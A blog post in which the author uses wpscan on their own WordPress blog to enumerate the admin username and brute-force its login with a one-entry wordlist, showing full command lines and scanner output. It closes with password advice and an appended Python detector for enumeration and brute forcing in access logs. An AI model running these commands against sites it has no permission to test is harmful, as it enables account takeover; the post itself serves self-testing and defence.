So this was fun! I installed wpscan on my machine and proceeded to “hack” my WordPress installation.
First, I got the admin username:
root@anna-lenovo:~/wpscan# ruby wpscan.rb --url https://blog.schoolfield.org --enumerate u
_______________________________________________________________
        __          _______   _____
        \ \        / /  __ \ / ____|
         \ \  /\  / /| |__) | (___   ___  __ _ _ __
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team
                       Version 2.7
          Sponsored by Sucuri - https://sucuri.net
   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________

[+] URL: https://blog.schoolfield.org/
[+] Started: Sun Apr 5 20:22:23 2015

[!] The WordPress 'https://blog.schoolfield.org/readme.html' file exists exposing a version number
[!] Full Path Disclosure (FPD) in: 'https://blog.schoolfield.org/wp-includes/rss-functions.php'
[+] Interesting header: SERVER: Apache/2.4.12 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4 PHP/5.4.39
[+] Interesting header: STRICT-TRANSPORT-SECURITY: "max-age=31536000"
[+] Interesting header: X-POWERED-BY: PHP/5.4.39
[+] XML-RPC Interface available under: https://blog.schoolfield.org/xmlrpc.php
[!] Upload directory has directory listing enabled: https://blog.schoolfield.org/wp-content/uploads/

[+] WordPress version 4.1.1 identified from meta generator

[+] WordPress theme in use: twentyfifteen - v1.0

[+] Name: twentyfifteen - v1.0
 |  Location: https://blog.schoolfield.org/wp-content/themes/twentyfifteen/
 |  Readme: https://blog.schoolfield.org/wp-content/themes/twentyfifteen/readme.txt
 |  Style URL: https://blog.schoolfield.org/wp-content/themes/twentyfifteen/style.css
 |  Theme Name: Twenty Fifteen
 |  Theme URI: https://wordpress.org/themes/twentyfifteen
 |  Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple,...
 |  Author: the WordPress team
 |  Author URI: https://wordpress.org/

[+] Enumerating plugins from passive detection ...
[+] No plugins found

[+] Enumerating usernames ...
[+] Identified the following 1 user/s:
    +----+-------+------+
    | Id | Login | Name |
    +----+-------+------+
    | 1  | anna  | anna |
    +----+-------+------+

[+] Finished: Sun Apr 5 20:22:31 2015
[+] Requests Done: 60
[+] Memory used: 688 KB
[+] Elapsed time: 00:00:07
And then, since I knew the password, I put it in /root/pass to make “cracking” it easier. I didn’t want to fool around with a bunch of massive password files; this is just a proof of concept.
root@anna-lenovo:~/wpscan# ruby wpscan.rb --url https://blog.schoolfield.org --wordlist /root/pass --username anna
_______________________________________________________________
        __          _______   _____
        \ \        / /  __ \ / ____|
         \ \  /\  / /| |__) | (___   ___  __ _ _ __
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team
                       Version 2.7
          Sponsored by Sucuri - https://sucuri.net
   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________

[+] URL: https://blog.schoolfield.org/
[+] Started: Sun Apr 5 20:30:10 2015

[!] The WordPress 'https://blog.schoolfield.org/readme.html' file exists exposing a version number
[!] Full Path Disclosure (FPD) in: 'https://blog.schoolfield.org/wp-includes/rss-functions.php'
[+] Interesting header: SERVER: Apache/2.4.12 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4 PHP/5.4.39
[+] Interesting header: STRICT-TRANSPORT-SECURITY: "max-age=31536000"
[+] Interesting header: X-POWERED-BY: PHP/5.4.39
[+] XML-RPC Interface available under: https://blog.schoolfield.org/xmlrpc.php
[!] Upload directory has directory listing enabled: https://blog.schoolfield.org/wp-content/uploads/

[+] WordPress version 4.1.1 identified from meta generator

[+] WordPress theme in use: twentyfifteen - v1.0

[+] Name: twentyfifteen - v1.0
 |  Location: https://blog.schoolfield.org/wp-content/themes/twentyfifteen/
 |  Readme: https://blog.schoolfield.org/wp-content/themes/twentyfifteen/readme.txt
 |  Style URL: https://blog.schoolfield.org/wp-content/themes/twentyfifteen/style.css
 |  Theme Name: Twenty Fifteen
 |  Theme URI: https://wordpress.org/themes/twentyfifteen
 |  Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple,...
 |  Author: the WordPress team
 |  Author URI: https://wordpress.org/

[+] Enumerating plugins from passive detection ...
[+] No plugins found

[+] Starting the password brute forcer
  Brute Forcing 'anna' Time: 00:00:00 <==================================================  > (7 / 9) 77.77%  ETA: 00:00:00
  [SUCCESS] Login : anna Password : <redacted>

  +----+-------+------+------------+
  | Id | Login | Name | Password   |
  +----+-------+------+------------+
  |    | anna  |      | <redacted> |
  +----+-------+------+------------+

[+] Finished: Sun Apr 5 20:30:15 2015
[+] Requests Done: 66
[+] Memory used: 636 KB
[+] Elapsed time: 00:00:05
This is why you need to use a complex password! Look at what the scan handed over with no credentials at all: the admin login (enumerated in the first run), the exact WordPress version from readme.html and the meta generator, directory listing on wp-content/uploads, and an open xmlrpc.php. Once the username is known, the password is the only thing standing between an attacker and the admin account, and a wordlist run like this one costs a few seconds, so the password has to be long and unique, and wp-login.php should be rate limited or lock out after repeated failures.
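What the two runs above look like from the server side, as an added example that is not part of the original post: a small detector over Apache combined-format access log lines that flags the username enumeration (a redirected /?author=N probe, assumed here as one route wpscan takes; the post's output does not show the requests it made) and a burst of POSTs to wp-login.php from one IP, including the case where a 302 (successful login) follows a run of 200s (failed logins re-render the form). The log lines, the IP addresses and the User-Agent string are constructed for the example, not taken from the author's server.

```python
"""Detect WPScan-style user enumeration and wp-login.php brute forcing in
Apache combined-format access logs.  Added example; the sample log is
constructed, not the author's real server log."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache "combined" log format (assumed layout of the access log).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
# /?author=1, /?author=2, ... : WordPress redirects these to /author/<login>/,
# which leaks the login name (assumed enumeration route, see lead-in).
AUTHOR_ENUM_RE = re.compile(r"^/\?author=\d+$")


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    return rec


def detect(lines, threshold=10, window=timedelta(seconds=60)):
    """Return {ip: sorted list of findings}.  Findings:
      author_enum      - a GET /?author=N that was answered with a redirect
      login_bruteforce - >= threshold POSTs to wp-login.php inside `window`
      login_success    - a 302 from wp-login.php after >= threshold failed
                         (HTTP 200) POSTs from the same IP
    The User-Agent is deliberately not used: the client controls it."""
    by_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            by_ip[rec["ip"]].append(rec)

    findings = defaultdict(set)
    for ip, recs in by_ip.items():
        recs.sort(key=lambda r: r["ts"])
        if any(r["method"] == "GET" and AUTHOR_ENUM_RE.match(r["path"])
               and r["status"] in (301, 302) for r in recs):
            findings[ip].add("author_enum")

        posts = [r for r in recs
                 if r["method"] == "POST" and r["path"].startswith("/wp-login.php")]
        start = 0      # left edge of the sliding time window
        failures = 0   # failed logins seen so far from this IP
        for i, r in enumerate(posts):
            while r["ts"] - posts[start]["ts"] > window:
                start += 1
            if i - start + 1 >= threshold:
                findings[ip].add("login_bruteforce")
            if r["status"] == 200:
                failures += 1
            elif r["status"] == 302 and failures >= threshold:
                findings[ip].add("login_success")
    return {ip: sorted(f) for ip, f in findings.items()}


def sample_log():
    """Constructed lines mimicking the post's two runs: an author-id probe,
    then nine rapid POSTs to wp-login.php, the last of which succeeds, plus
    one ordinary visitor who logs in normally.  IPs are documentation ranges
    and the WPScan User-Agent string is an assumption."""
    attacker, ua = "203.0.113.7", "WPScan v2.7 (http://wpscan.org)"

    def line(ip, ts, req, status, size, agent=ua):
        return f'{ip} - - [{ts}] "{req}" {status} {size} "-" "{agent}"'

    lines = [
        line(attacker, "05/Apr/2015:20:22:25 +0000", "GET /?author=1 HTTP/1.1", 301, 0),
        line(attacker, "05/Apr/2015:20:22:25 +0000", "GET /author/anna/ HTTP/1.1", 200, 9213),
        line("198.51.100.23", "05/Apr/2015:20:25:01 +0000", "GET / HTTP/1.1", 200, 12044, "Mozilla/5.0"),
        line("198.51.100.23", "05/Apr/2015:20:25:40 +0000", "POST /wp-login.php HTTP/1.1", 302, 0, "Mozilla/5.0"),
    ]
    for i in range(8):  # eight wrong guesses: WordPress re-renders the form with 200
        lines.append(line(attacker, f"05/Apr/2015:20:30:{10 + i:02d} +0000",
                          "POST /wp-login.php HTTP/1.1", 200, 3152))
    lines.append(line(attacker, "05/Apr/2015:20:30:18 +0000",
                      "POST /wp-login.php HTTP/1.1", 302, 0))
    return lines


if __name__ == "__main__":
    print(detect(sample_log(), threshold=5))
```

With threshold=5 the constructed attacker IP is flagged for all three findings and the ordinary visitor for none; with the default threshold of 10 the nine-request run only trips author_enum, which is why the threshold and window should be tuned to the site's real login rate rather than left at a guess.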